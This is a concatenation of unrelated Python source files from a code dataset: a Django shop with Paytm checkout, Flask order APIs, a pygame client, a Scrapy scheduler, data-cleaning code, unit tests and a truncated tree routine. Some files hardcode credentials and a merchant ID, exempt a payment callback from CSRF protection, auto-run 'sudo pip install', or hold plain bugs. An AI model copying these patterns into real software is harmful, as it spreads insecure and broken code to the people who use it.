Product.objects.all()\n # total_products = len(my_products)\n # total_slides = total_products // 4 + (ceil(total_products / 4) - total_products // 4)\n\n # products = {\"product\": my_products, \"range\": range(1, total_slides, \"no_of_slides\": total_slides )}\n\n # allProducts = [[my_products, range(1, total_slides), total_slides],\n # [my_products, range(1, total_slides), total_slides]]\n\n allProducts = []\n\n # Fetching all product categories\n prod_categories = Product.objects.values('product_category', 'id')\n\n # adding unique product categories in set - categories\n categories = {item['product_category'] for item in prod_categories}\n\n # Iterating through each category and appending to allProdcuts\n for category in categories:\n product = Product.objects.filter(product_category=category)\n total_products = len(product)\n total_slides = total_products // 4 + (ceil(total_products / 4) - total_products // 4)\n allProducts.append([product, 
range(1, total_slides), total_slides])\n\n products = {'allProducts': allProducts}\n\n return render(request=request, template_name=\"shop/index.html\", context=products)\n\n\ndef about(request):\n return render(request=request, template_name=\"shop/about.html\")\n\n\ndef contact(request):\n if request.method == \"POST\":\n name = request.POST.get('name', '')\n email = request.POST.get('email', '')\n phone = request.POST.get('phone', '')\n query = request.POST.get('query', '')\n\n contact = Contact(contact_name=name, contact_email=email, contact_phone=phone, contact_description=query)\n contact.save()\n success = True\n return render(request=request, template_name=\"shop/contact.html\", context={'success': success})\n\n return render(request=request, template_name=\"shop/contact.html\")\n\n\ndef tracker(request):\n if request.method == \"POST\":\n order_id = request.POST.get('orderId', '')\n email = request.POST.get('email', '')\n\n try:\n # If such order exists\n order = Order.objects.filter(order_id=order_id, order_email=email)\n if len(order) > 0:\n # Get the updates\n order_update = OrderTracker.objects.filter(order_id=order_id)\n updates = []\n\n # Appends updates and return the response in JSON form\n for item in order_update:\n updates.append({'desc': item.track_desc, 'time': item.track_timestamp.strftime(\"%d %B, %Y\")})\n response = json.dumps([updates, order[0].order_items], default=str)\n return HttpResponse(response)\n else:\n return HttpResponse('{}')\n\n except Exception as e:\n return HttpResponse('{}')\n return render(request=request, template_name=\"shop/tracker.html\")\n\n\ndef search(request):\n return render(request=request, template_name=\"shop/search.html\")\n\n\ndef viewproduct(request, vid):\n product = Product.objects.filter(id=vid)\n return render(request=request, template_name=\"shop/viewproduct.html\", context={'product': product[0]})\n\n\ndef checkout(request):\n if request.method == \"POST\":\n name = request.POST.get('name', '')\n 
email = request.POST.get('email', '')\n add = request.POST.get('add1', '') + \" \" + request.POST.get('add2', '')\n phone = request.POST.get('phone', '')\n city = request.POST.get('city', '')\n state = request.POST.get('state', '')\n pincode = request.POST.get('pincode', '')\n items = request.POST.get('jsonItems', '')\n amount = request.POST.get('amount', '')\n\n order = Order(order_name=name, order_email=email, order_add=add, order_phone=phone,\n order_city=city, order_state=state, order_pincode=pincode, order_items=items, order_amount=amount)\n order.save()\n oid = order.order_id\n order_status = True\n\n track = OrderTracker(order_id=oid, track_desc=\"The order has been placed successfully!\")\n track.save()\n # return render(request=request, template_name=\"shop/checkout.html\",\n # context={'order_status': order_status, 'id': oid})\n\n # Request paytm to transfer amount to your account after user pays it\n\n param_dict = {\n 'MID': 'WorldP64425807474247',\n 'ORDER_ID': str(order.order_id),\n 'TXN_AMOUNT': str(amount),\n 'CUST_ID': email,\n 'INDUSTRY_TYPE_ID': 'Retail',\n 'WEBSITE': 'WEBSTAGING',\n 'CHANNEL_ID': 'WEB',\n 'CALLBACK_URL': 'http://127.0.0.1:8000/shop/handlerequest/',\n }\n param_dict['CHECKSUMHASH'] = Checksum.generate_checksum(param_dict, MERCHANT_KEY)\n\n return render(request, 'shop/paytm.html', {'param_dict': param_dict})\n\n return render(request=request, template_name=\"shop/checkout.html\")\n\n\n@csrf_exempt\ndef handlerequest(request):\n # paytm will send us request here\n form = request.POST\n response_dict = {}\n for i in form.keys():\n response_dict[i] = form[i]\n if i == 'CHECKSUMHASH':\n checksum = form[i]\n verify = Checksum.verify_checksum(response_dict, MERCHANT_KEY, checksum)\n if verify:\n if response_dict['RESPCODE'] == '01':\n print('Order Successful')\n else:\n print('Order was not successful because ' + response_dict['RESPMSG'])\n return render(request, 'shop/paymentstatus.html', {'response': 
response_dict})\n","sub_path":"mac/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"107278239","text":"import pygame,sys\nimport web_client\nfrom menu_view import MenuView\n\nclass MainFrame:\n\t# Constants\n\tSCREEN_SIZE = (800,600)\n\tBG_COLOR = (255,255,255)\n\n\tdef __init__(self):\n\t\tpygame.init()\n\t\tself.screen = pygame.display.set_mode(self.SCREEN_SIZE)\n\t\tself.clock = pygame.time.Clock()\n\t\tself.elements = []\n\n\t\tself.user = web_client.login(\"kymani37299\",\"some_pass\")\n\t\tself.view = MenuView(self.user)\n\t\tself.elements.append(self.view)\n\t\t\n\n\tdef run(self):\n\t\twhile 1:\n\t\t\tself.handle_events()\n\t\t\tself.refresh_frame()\n\t\t\tself.clock.tick(60)\n\n\tdef handle_events(self):\n\t\tfor event in pygame.event.get():\n\t\t\t\tif(event.type == pygame.QUIT):\n\t\t\t\t\tsys.exit()\n\t\t\t\tfor element in self.elements:\n\t\t\t\t\tfor action in element.get_actions():\n\t\t\t\t\t\tif(action.condition(event)):\n\t\t\t\t\t\t\taction.handle()\n\n\tdef refresh_frame(self):\n\t\tself.screen.fill(self.BG_COLOR)\n\t\t#Draw layers\n\t\tfor element in self.elements:\n\t\t\telement.draw(self.screen)\n\t\tpygame.display.flip()\n\n\nif __name__ == \"__main__\":\n\tMainFrame().run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"587187749","text":"##############################################################################\n#\n# Copyright (c) 2003 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). 
A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\nimport unittest\n\nfrom zope.security.interpreter import RestrictedInterpreter\nfrom zope.security.checker import defineChecker\n\nfrom zope.testing.cleanup import CleanUp\n\nclass RITests(unittest.TestCase, CleanUp):\n\n def setUp(self):\n CleanUp.setUp(self)\n self.rinterp = RestrictedInterpreter()\n\n def tearDown(self):\n CleanUp.tearDown(self)\n\n def testExec(self):\n self.rinterp.ri_exec(\"str(type(1))\\n\")\n\n def testImport(self):\n self.rinterp.ri_exec(\"import zope.security.proxy\")\n\n def testWrapping(self):\n # make sure we've really got proxies\n import types\n from zope.security.checker import NamesChecker\n\n checker = NamesChecker(['Proxy'])\n\n import zope.security.proxy\n defineChecker(zope.security.proxy, checker)\n\n checker = NamesChecker(['BuiltinFunctionType'])\n defineChecker(types, checker)\n\n code = (\"from zope.security.proxy import Proxy\\n\"\n \"import types\\n\"\n \"assert type(id) is not types.BuiltinFunctionType\\n\"\n )\n self.rinterp.ri_exec(code)\n\n def testGlobalVersusLocal(self):\n code = (\"global x\\n\"\n \"x = 1\\n\"\n \"y = 2\\n\")\n self.rinterp.ri_exec(code)\n self.assert_('x' in self.rinterp.globals)\n self.assert_('y' not in self.rinterp.globals)\n self.assertEqual(self.rinterp.globals['x'], 1)\n self.assert_('x' not in self.rinterp.locals)\n self.assert_('y' in self.rinterp.locals)\n self.assertEqual(self.rinterp.locals['y'], 2)\n\n\ndef test_suite():\n return unittest.makeSuite(RITests)\n\n\nif __name__=='__main__':\n from unittest import main\n 
main(defaultTest='test_suite')\n","sub_path":"Zope3/tags/ZopeInterface-3.0.0b1/src/zope/security/tests/test_interpreter.py","file_name":"test_interpreter.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"644138767","text":"\"\"\"\r\nauthor: Varun Rajiv Mantri\r\n\"\"\"\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef file_reader(file_name):\r\n '''\r\n This method reads in the data from a csv file\r\n :param file_name:name of the input file\r\n :return:\r\n '''\r\n complete_data = []\r\n with open(file_name) as file:\r\n for row in file:\r\n row = row.strip()\r\n row = row.split(\",\")\r\n complete_data.append(row)\r\n return complete_data\r\n\r\n\r\ndef peak_finder(row, mean):\r\n '''\r\n This method finds the peaks\r\n :param row: record under consideration\r\n :param mean: mean value for that record\r\n :return: peaks\r\n '''\r\n peaks = []\r\n previous = abs(float(row[0]))\r\n current = abs(float(row[1]))\r\n next_item = abs(float(row[2]))\r\n biggest_peak = 0\r\n for index in range(3, len(row) - 1):\r\n if current > previous and current > next_item and current > (mean + 5):\r\n peaks.append(index)\r\n previous = current\r\n current = abs(float(row[index]))\r\n if current > biggest_peak:\r\n biggest_peak = current\r\n next_item = abs(float(row[index + 1]))\r\n return peaks, biggest_peak\r\n\r\n\r\ndef mean_calculator(row):\r\n mean = 0\r\n for value in row:\r\n mean = mean + float(value)\r\n mean = round(mean / len(row), 3)\r\n return mean\r\n\r\n\r\ndef rejection_condition_two(row):\r\n '''\r\n This method looks for peaks and counts only those peaks that have sudden falls at precisely same location\r\n across more than 5 leads\r\n :param complete_data: Complete input data\r\n :return: Bad data list\r\n '''\r\n lower_limit = 0\r\n upper_limit = 100\r\n leads = 0\r\n location_recorder = [False for _ in range(12)]\r\n index_recorder = [False for _ in 
range(12)]\r\n while leads < 12:\r\n max_peak = float(\"-inf\")\r\n for index in range(lower_limit, upper_limit):\r\n if float(row[index]) > max_peak:\r\n max_peak = float(row[index])\r\n location = index\r\n lower_limit = upper_limit\r\n upper_limit = upper_limit + 100\r\n\r\n mean = mean_calculator(row)\r\n # checking if the next value is the biggest\r\n if location + 1 < 1200:\r\n if float(row[location + 1]) < (mean + 5):\r\n location_recorder[leads] = True\r\n index_recorder[leads] = location - lower_limit\r\n if location - 1 >= 0:\r\n if float(row[location - 1]) < (mean + 5):\r\n location_recorder[leads] = True\r\n index_recorder[leads] = location - lower_limit\r\n leads = leads + 1\r\n max_count = 0\r\n for index in range(len(index_recorder) - 1):\r\n current = index_recorder[index]\r\n counter = 0\r\n for index_1 in range(index, len(index_recorder)):\r\n if current == index_recorder[index_1]:\r\n counter = counter + 1\r\n if max_count < counter:\r\n max_count = counter\r\n value = current\r\n counter = 0\r\n for index in range(len(index_recorder)):\r\n if index_recorder[index] == value:\r\n if location_recorder[index] == True:\r\n counter = counter + 1\r\n if counter >= 5:\r\n return True\r\n return False\r\n\r\n\r\ndef rejection_condition_one(row):\r\n '''\r\n This method rejects the records\r\n :param complete_data:\r\n :return: correct and incorrect records list\r\n '''\r\n flag = False\r\n mean = 0\r\n for value in row:\r\n mean = mean + float(value)\r\n mean = round(mean / len(row), 3)\r\n count = 0\r\n upper_limit = 100\r\n lower_limit = 0\r\n # finding peaks\r\n peaks, biggest_peak = peak_finder(row, mean)\r\n mid_value = (mean + biggest_peak) / 2\r\n while (count < 12):\r\n for i in range(lower_limit, lower_limit + 9):\r\n # cheking first five\r\n if abs(float(row[i])) >= mean + mid_value:\r\n flag = True\r\n break\r\n for i in range(upper_limit - 1, upper_limit - 10, -1):\r\n # cheking first five\r\n # print(upper_limit)\r\n if abs(float(row[i])) >= 
mean + mid_value:\r\n flag = True\r\n break\r\n if flag == True:\r\n break\r\n count = count + 1\r\n lower_limit = upper_limit\r\n upper_limit = upper_limit + 100\r\n for index in peaks:\r\n if round(float(row[index + 1])) == 0:\r\n flag = True\r\n elif round(float(row[index - 1])) == 0:\r\n flag = True\r\n if flag == True:\r\n return True\r\n return False\r\n\r\n\r\ndef plotter(data, fig):\r\n lower_limit = 0\r\n upper_limit = 100\r\n figure_count = 1\r\n plt.figure(fig)\r\n row = 1\r\n col = 1\r\n for _ in range(12):\r\n temp = []\r\n for index in range(lower_limit, upper_limit):\r\n temp.append(float(data[index]))\r\n plt.subplot(4, 3, figure_count)\r\n plt.plot(temp)\r\n plt.title(\"Lead\" + str(figure_count))\r\n lower_limit = upper_limit\r\n upper_limit = upper_limit + 100\r\n figure_count = figure_count + 1\r\n\r\n\r\ndef combine(incorrect_record_list, bad_list):\r\n dicto = {}\r\n for item in incorrect_record_list:\r\n dicto[item] = True\r\n for item in bad_list:\r\n if item not in dicto.keys():\r\n dicto[item] = True\r\n complete_list = []\r\n for item in dicto.keys():\r\n complete_list.append(item)\r\n return complete_list\r\n\r\n\r\ndef check_quality(record):\r\n status = rejection_condition_one(record)\r\n if status == False:\r\n status = rejection_condition_two(record)\r\n if status == False:\r\n return 'good'\r\n else:\r\n return 'bad'\r\n\r\n\r\n'''\r\ndef main():\r\n complete_data=file_reader(\"train_x.csv\")\r\n check_quality(record)\r\n incorrect_record_list,correct_records=rejection_condition_one(complete_data)\r\n bad_list=rejection_condition_two(complete_data)\r\n incorrect_record_list=combine(incorrect_record_list,bad_list)\r\n print(\"-----------------------------------\")\r\n print(\"Incorrect record ID's: \")\r\n print(incorrect_record_list)\r\n print(\"Correct record ID's:\")\r\n print(correct_records)\r\n print(\"\\n\\nPercentage of records that are wrong:\"+str(round((len(incorrect_record_list)/len(complete_data))*100,3))+\"%\")\r\n 
print(\"-----------------------------------\")\r\n plotter(complete_data[correct_records[8]],0)\r\n plt.title(\"Good Records\")\r\n plotter(complete_data[incorrect_record_list[8]], 1)\r\n plt.title(\"Bad Records\")\r\n plt.show()\r\n'''\r\n\r\n\r\n# main()\r\n","sub_path":"data_cleaning_record.py","file_name":"data_cleaning_record.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"181555658","text":"import pytest\n\n\n@pytest.fixture(autouse=True)\ndef skip_testrpc_and_wait_for_mining_start(webu,\n wait_for_miner_start,\n skip_if_testrpc):\n skip_if_testrpc(webu)\n\n wait_for_miner_start(webu)\n\n assert webu.eth.mining\n assert webu.eth.hashrate\n assert webu.miner.hashrate\n","sub_path":"tests/core/txpool-module/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"261410505","text":"import os, signal, sys\ntry:\n import scrapy, pandas\n from apscheduler.schedulers.background import BackgroundScheduler\nexcept Exception as e:\n print(e)\n os.system('sudo -H python3.6 -m pip install -r requirements.txt')\n print('installing required packages, please reload script')\n sys.exit(1)\n\ndef callspider():\n cwd = os.getcwd()\n os.system(f'cd {cwd} && scrapy crawl YahooStocks')\n\ndef mainf():\n freq = input('script will run every (minutes, def = 3): ')\n if freq!='':\n freq = int(freq)\n else:\n freq = 3\n hm = input('input at what hour and minute script should stop, separated by whitespace (def 5:30): ')\n if hm!='':\n h,m = hm.split()\n h,m = int(h),int(m)\n else:\n h = 5\n m = 30\n cwd = os.getcwd()\n os.system(f'cd {cwd} && scrapy crawl YahooStocks')\n scheduler = BackgroundScheduler()\n def stopspider(*args):\n scheduler.shutdown()\n sys.exit(0)\n scheduler.add_job(stopspider,'cron', hour=h,minute=m)\n 
scheduler.add_job(callspider,'interval',minutes=freq)\n scheduler.start()\n def signal_handler(*args):\n stopspider()\n\n signal.signal(signal.SIGINT, signal_handler)\n print('press Ctrl+C to exit (clears scheduled job from crontab)')\n signal.pause()\n\n\nif __name__ == '__main__':\n mainf()\n\n","sub_path":"YahooStocks/YahooStocks/spiders/CronSchedule.py","file_name":"CronSchedule.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"20674175","text":"from django.contrib import admin\nfrom .models import Users, CategoriesCompanies, Companies\n\n\n# Register your models here.\n\n@admin.register(Users)\nclass UsersAdmin(admin.ModelAdmin):\n # поля, которые не нужно редактировать в админке\n readonly_fields = ('password', 'is_superuser', 'last_login', 'date_joined') # 'user_permissions', 'groups')\n\n # какие поля выводить в админке\n list_display = ('username', 'first_name', 'last_name', 'is_staff', 'is_active', 'phone', 'email')\n\n # по каким полям может осуществляться поиск в админке\n search_fields = ('username',\n 'first_name',\n 'last_name',\n 'patronymic',\n 'company',\n 'position',\n 'project',\n 'phone',\n 'email',)\n\n # укажем быстрые фильтры для фильтрации записей\n list_filter = ('is_staff', 'is_active', 'gender', 'company', 'city')\n\n # в админке поля формы можно группировать\n fieldsets = (\n ('Личные данные',\n {'fields': ('username', 'password', 'first_name', 'last_name', 'patronymic', 'gender', 'birthday')}),\n ('Контактные данные', {'fields': ('phone', 'email')}),\n ('Данные сотрудника',\n {'fields': ('is_staff', 'is_active', 'company', 'groups', 'position', 'project',)}),\n )\n\n\n@admin.register(CategoriesCompanies)\nclass CategoriesCompaniesAdmin(admin.ModelAdmin):\n list_display = ('name_category', 'description')\n search_fields = ('name_category', 'description',)\n\n\n@admin.register(Companies)\nclass CompaniesAdmin(admin.ModelAdmin):\n 
list_display = ('name_company', 'inn', 'get_category_company', 'city')\n search_fields = ('name_company',\n 'short_name',\n 'form_company',\n 'category_company',\n 'inn',\n 'city',\n 'address',\n 'phone',\n 'email',)\n # укажем быстрые фильтры для фильтрации записей\n list_filter = ('category_company', 'city')\n","sub_path":"bridges/authapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"244714260","text":"import json\nimport os\nfrom flask import request\n\nfrom huanmiAPI.db import client\nfrom huanmiAPI.models import Ad, Campaign, User\nfrom huanmiAPI.vault import vault\nfrom huanmiAPI import app\n\nFAILED = lambda e: json.dumps({'status': 1, 'reason': str(e)})\nUNAUTHORIZED = json.dumps({'status': 1, 'reason': 'Unauthorized'})\nUSER_ID_EXISTS = json.dumps({'status': 1, 'reason': 'User ID already exists.'})\nUSER_ID_MISMATCH = json.dumps({'status': 1, 'reason': 'User ID mismatched.'})\nCONSTANT_UPDATE = json.dumps({\n 'status': 1,\n 'reason': 'Constant data is not allowed to update.'\n})\nCANNOTPUBLISH = json.dumps({'status': 1, 'reason': 'Cannot post published ad.'})\nINCOMPLETE_AD = json.dumps({'status': 1, 'reason': 'Draft data is incomplete.'})\n\n_secret = vault['secret']\n\ndef _auth(secret):\n return secret == _secret\n\n@app.route(\"/user/add/\", methods=['POST'])\ndef createUser():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['id']\n source = request.form['source']\n try:\n user = User.User(client, userId, source, create = True)\n except User.UserIdExists:\n return USER_ID_EXISTS\n return json.dumps({'status': 0, 'data': user.get()})\n\n@app.route(\"/user/update/\", methods=['POST'])\ndef updateUser():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['id']\n key = request.form['key']\n value = request.form['value']\n isList = ('is-list' in 
request.form) and request.form['is-list']\n try:\n user = User.User(client, userId)\n user.update(key, value, isList = isList)\n except User.ConstantUpdatesForbidden:\n return CONSTANT_UPDATE\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': user.get()})\n\n@app.route(\"/user/view//\")\ndef viewUser(user_id):\n try:\n user = User.User(client, user_id)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': user.get()})\n\n@app.route(\"/ad/add/\", methods=['POST'])\ndef createAd():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n try:\n ad = Ad.Ad(client, userId = userId)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': ad.get()})\n\n@app.route(\"/ad/update/\", methods=['POST'])\ndef updateAd():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n adId = request.form['id']\n key = request.form['key']\n value = request.form['value']\n isList = ('is-list' in request.form) and request.form['is-list']\n try:\n ad = Ad.Ad(client, adId, userId, table = Ad.BUILD)\n ad.update(key, value, isList = isList)\n except Ad.UserNotMatch:\n return USER_ID_MISMATCH\n except User.ConstantUpdatesForbidden:\n return CONSTANT_UPDATE\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': ad.get()})\n\n@app.route('/ad/publish/', methods=['POST'])\ndef publishAd():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n adId = request.form['id']\n try:\n ad = Ad.Ad(client, adId, userId, table = Ad.BUILD)\n ad.build()\n except Ad.NotDraftAd:\n return CANNOTPUBLISH\n except Ad.NotCompleteAd:\n return INCOMPLETE_AD\n return json.dumps({'status': 0, 'data': ad.get()})\n\n@app.route('/ad/draft//')\n@app.route('/ad/view//')\ndef viewAd(ad_id):\n table = Ad.PRODUCT\n if request.path.split('/')[2] == 'draft':\n table = Ad.BUILD\n try:\n ad 
= Ad.Ad(client, ad_id, table = table)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': json.dumps(ad.get())})\n\n@app.route('/campaign/add/', methods=['POST'])\ndef createCampaign():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n try:\n campaign = Campaign.Campaign(client, userId = userId)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': campaign.get()})\n\n@app.route('/campaign/update/', methods=['POST'])\ndef updateCampaign():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n campaignId = request.form['id']\n key = request.form['key']\n value = request.form['value']\n isList = ('is-list' in request.form) and request.form['is-list']\n try:\n campaign = Campaign.Campaign(client, campaignId, userId)\n campaign.update(key, value, isList = isList)\n except User.ConstantUpdatesForbidden:\n return CONSTANT_UPDATE\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': campaign.get()})\n\n@app.route('/campaign/view//')\ndef viewCampaign(campaign_id):\n try:\n campaign = Campaign.Campaign(client, campaign_id)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': json.dumps(campaign.get())})\n","sub_path":"huanmiAPI/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527539665","text":"#!venv/bin/python\nfrom flask import Flask, jsonify, abort, make_response, request, url_for\nfrom flask.ext.httpauth import HTTPBasicAuth\nimport time\nimport datetime\n\n\napp = Flask(__name__)\nauth = HTTPBasicAuth()\nts = time.time()\n\n# need to add setup.py and unit tests\n\n# datastore\norders = [\n {\n 'id': 44029472,\n 'date': u'',\n 'customer_id': 220300,\n 'customer_name': u'David',\n 'customer_address': u'Anchorage, Alaska'\n 
},\n {\n 'id': 440929472,\n 'date': u'',\n 'customer_id': 220300,\n 'customer_name': u'Jack',\n 'customer_address': u'New York, New York'\n },\n]\n\n@app.route('/')\ndef index():\n return \"Flask API!\" # should print out the endpoints to the user\n\n@app.route('/orders/api/v1.0/orders', methods=['GET'])\n@auth.login_required\ndef get_orders():\n return jsonify({'orders': [make_public_order(order) for order in orders]})\n\n@app.route('/orders/api/v1.0/order/', methods=['GET'])\n@auth.login_required\ndef get_order(order_id):\n order = [order for order in orders if order['id'] == order_id]\n if len(order) == 0:\n abort(404)\n return jsonify({'order': order[0]})\n\n@app.route('/orders/api/v1.0/orders', methods=['POST'])\n@auth.login_required\ndef create_order():\n if not request.json or not 'title' in request.json:\n abort(400)\n order = {\n 'id': orders[-1]['id'] + 1,\n 'date': datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S'),\n 'customer_id': order[-1]['customer_id'] + 1,\n 'customer_name': request.json.get('customer_name', \"\"),\n 'customer_address': request.json.get('customer_name', \"\")\n }\n orders.append(order)\n return jsonify({'order': make_public_order(order)}), 201\n\n@app.route('/orders/api/v1.0/order/', methods=['PUT'])\n@auth.login_required\ndef update_order(order_id):\n if not request.json or not order_id:\n abort(400)\n for order in (t for t in orders if t['id'] == order_id):\n order['customer_id'] = request.json.get('customer_id', order['customer_id'])\n order['customer_name'] = request.json.get('customer_name', order['customer_name'])\n order['customer_address'] = request.json.get('description', order['customer_address'])\n return jsonify({'order': make_public_order(order)})\n abort(404)\n\ndef make_public_order(order):\n new_order = {}\n for field in order:\n if field == 'id':\n new_order['uri'] = url_for('get_order', order_id = order['id'], _external = True)\n else:\n new_order[field] = order[field]\n return new_order\n\n# 
authentication\n@auth.get_password\ndef get_password(username):\n if username == 'test':\n return 'password'\n return None\n\n# error handling\n@auth.error_handler\ndef unauthorized():\n return make_response(jsonify({'error': 'Unauthorized access'}), 401)\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\nif __name__ == '__main__':\n app.run(debug=True)\n \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"330818736","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: show_best_slave.py\n\n Description: Unit testing of show_best_slave in mysql_rep_failover.py.\n\n Usage:\n test/unit/mysql_rep_failover/show_best_slave.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport os\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n# Third-party\nimport mock\n\n# Local\nsys.path.append(os.getcwd())\nimport mysql_rep_failover\nimport lib.gen_libs as gen_libs\nimport version\n\n__version__ = version.__version__\n\n\nclass SlaveRep(object):\n\n \"\"\"Class: SlaveRep\n\n Description: Class stub holder for mysql_class.SlaveRep class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, name, exe_gtidset, gtid_mode):\n\n \"\"\"Method: __init__\n\n Description: Class initialization.\n\n Arguments:\n (input) name\n (input) exe_gtidset\n (input) gtid_mode\n\n \"\"\"\n\n self.name = name\n self.exe_gtidset = exe_gtidset\n self.gtid_mode = gtid_mode\n\n\nclass UnitTest(unittest.TestCase):\n\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_one_slave\n test_default\n\n \"\"\"\n\n def setUp(self):\n\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n\n self.slave1 = 
SlaveRep(\"slave1\", \"20\", True)\n self.slave2 = SlaveRep(\"slave2\", \"10\", True)\n self.slave3 = SlaveRep(\"slave3\", \"15\", True)\n self.slavearray = []\n self.slavearray2 = []\n self.slavearray.append(self.slave1)\n self.slavearray.append(self.slave2)\n self.slavearray.append(self.slave3)\n self.slavearray2.append(self.slave1)\n self.slaveorder = []\n self.slaveorder2 = []\n slv0 = self.slavearray[0]\n slv1 = self.slavearray[1]\n slv2 = self.slavearray[2]\n self.slaveorder.append((slv1.exe_gtidset, slv1))\n self.slaveorder.append((slv2.exe_gtidset, slv2))\n self.slaveorder.append((slv0.exe_gtidset, slv0))\n self.slaveorder2.append((slv1.exe_gtidset, slv1))\n self.args_array = {}\n\n @mock.patch(\"mysql_rep_failover.order_slaves_on_gtid\")\n def test_one_slave(self, mock_order):\n\n \"\"\"Function: test_one_slave\n\n Description: Test with only one slave in list.\n\n Arguments:\n\n \"\"\"\n\n mock_order.return_value = self.slaveorder2\n\n with gen_libs.no_std_out():\n self.assertEqual(mysql_rep_failover.show_best_slave(\n self.slavearray2, self.args_array), (False, None))\n\n @mock.patch(\"mysql_rep_failover.order_slaves_on_gtid\")\n def test_default(self, mock_order):\n\n \"\"\"Function: test_show_best_slave\n\n Description: Test with default arguments only.\n\n Arguments:\n\n \"\"\"\n\n mock_order.return_value = self.slaveorder\n\n with gen_libs.no_std_out():\n self.assertEqual(mysql_rep_failover.show_best_slave(\n self.slavearray, self.args_array), (False, None))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/unit/mysql_rep_failover/show_best_slave.py","file_name":"show_best_slave.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"480773928","text":"# Exercise: while exercise 1\n# 5.0/5.0 points (graded)\n# ESTIMATED TIME TO COMPLETE: 5 minutes\n\n# In this problem you'll be given a chance to practice writing some while loops.\n\n# 
1. Convert the following into code that uses a while loop.\n\n# print 2\n# prints 4\n# prints 6\n# prints 8\n# prints 10\n# prints Goodbye!\nn = 2;\nwhile(n <= 10):\n print(n)\n n += 2\nprint('Goodbye!')\n","sub_path":"week1_python_basics/core_elements_of_programs/while_exercise_1.py","file_name":"while_exercise_1.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"462378335","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\ndef check_subtree(t: Node, s: Node):\n if t is None and s is None:\n return True\n if t is None or s is None:\n return False\n return t.data == s.data and check_subtree(t.left, s.left) and check_subtree(t.right, s.right)\n\n\ndef is_subtree(t: Node, s: Node) -> bool:\n\n if s is None:\n return True\n if t is None:\n return False\n if check_subtree(t, s):\n return True\n return is_subtree(t.left, s) or is_subtree(t.right, s)\n\n\nif __name__ == \"__main__\":\n T = Node(26)\n T.right = Node(3)\n T.right.right = Node(3)\n T.left = Node(10)\n T.left.left = Node(4)\n T.left.left.right = Node(30)\n T.left.right = Node(6)\n\n \"\"\"\n creating second tree\n \"\"\"\n S = Node(10)\n S.right = Node(6)\n S.left = Node(4)\n S.left.right = Node(30)\n\n print(is_subtree(T, 